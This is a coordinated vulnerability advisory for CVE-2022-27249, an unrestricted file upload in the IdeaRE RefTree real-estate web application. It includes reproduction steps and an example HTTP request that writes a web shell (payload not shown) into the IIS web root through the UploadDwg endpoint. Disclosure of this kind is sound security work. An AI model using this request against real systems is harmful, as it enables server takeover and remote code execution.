===============================================================================
title: IdeaRE RefTree Remote Code Execution
product: IdeaRE RefTree < 2021.09.17
vulnerability type: Unrestricted File Upload
CVE ID: CVE-2022-27249
severity: High
CVSSv3 score: 8.8
CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
found: 2021-09-13
by: Savino Sisco saviosisco@gmail.com
===============================================================================
[EXECUTIVE SUMMARY]
RefTree is a web application made for managing complex real estate situations.
Among other features, it offers the possibility for authenticated users
to upload and download DWG (CAD drawings) files for buildings.
During a penetration test activity, an "Unrestricted File Upload" vulnerability
was found which leverages the upload feature to upload a file anywhere on the
target system.
By uploading a malicious web page, like an aspx web shell, to the server's
web root it is possible to achive code execution by just navigating to the
malicious page with a web browser.
[VULNERABLE VERSIONS]
IdeaRE RefTree < 2021.09.17
[TECHNICAL DETAILS]
It is possible to reproduce the issue following these steps:
1. Log into the application to get a valid session cookie
2. Get a valid "ObjId" from the application (the ID of a building to associate
the file to)
3. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/UploadDwg'
to upload a file on the target system, for example a web shell in the
server's web root
4. Navigate to the new page with a web browser to trigger code execution
Example of the HTTP request to the Upload endpoint:
POST /CaddemServiceJS/CaddemService.svc/rest/UploadDwg HTTP/2
Host: [REDACTED]
Cookie: ASP.NET_SessionId=b1125gke23enpul1ukeu1ouy
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 2211
Origin: https://[REDACTED]
Referer: https://[REDACTED]/Reftreespace/
{
"FileContent": "[BASE64_PAYLOAD]",
"DwgName": "C:\\inetpub\\wwwroot\\webshell.aspx",
"UploadType": "WorkingCopy",
"ObjId": 4774726,
"ObjType": 5,
"UpdateState": true,
"DwgOp": 23
}
HTTP/2 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: [REDACTED]
X-Powered-By: ASP.NET
Date: Fri, 10 Sep 2021 15:00:53 GMT
Content-Length: 24
{"UploadDwgResult":null}
[VULNERABILITY REFERENCE]
The following CVE ID was allocated to track the vulnerabilities:
CVE-2022-27249
[DISCLOSURE TIMELINE]
2021-09-13 Vulnerability disclosed to our customer and the vendor.
Vendor acknowledged the issue.
2021-09-17 Vendor released a fix for the software.
2021-10-15 The vulnerability was rechecked in the newer version to confirm
that is was indeed fixed.
2022-03-15 Researcher requested to publicly disclose the issue; public
coordinated disclosure.
[RESOLUTION]
Update the software to a version >= 2021.09.17
Savino Sisco <saviosisco@gmail.com>
https://www.linkedin.com/in/savino-sisco/